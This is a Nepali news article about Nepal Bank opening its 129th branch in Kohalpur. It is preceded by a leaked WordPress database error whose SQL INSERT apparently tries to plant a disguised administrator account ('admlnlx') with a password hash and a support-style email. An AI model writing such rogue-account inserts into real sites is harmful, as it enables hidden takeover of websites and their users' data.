WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BjvGSFPcBFMETwnO2BJ5TYrkvZhhOW1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 22:26:36', '', 'admlnlx', 'admlnlx')
कोहलपुर, माघ १०-
नेपाल बैंक लिमिटेडले कोहलपुरमा १२९औँ शाखा विस्तार गरेको छ ।
प्रमुख जिल्ला अधिकारी रविलाल पन्थले आज यहाँ आयोजित समारोहमा सो शाखा शुभारम्भ गर्दै नेपालकै सबैभन्दा पुरानो बैंक नेपाल बैंक भएकाले यसले यसप्रति ग्राहकको विश्वसनीयता बढ्दै गएको बताउनुभयो । बैंक सञ्चालक समितिका सदस्य डा डम्बरबहादुर भण्डारीले कोहलपुर क्षेत्र मध्यपश्चिम क्षेत्रकै केन्द्रबिन्दु भएकाले यसबाट ग्राहकलाई सेवा दिन सहज हुने उल्लेख गर्नुभयो । -रासस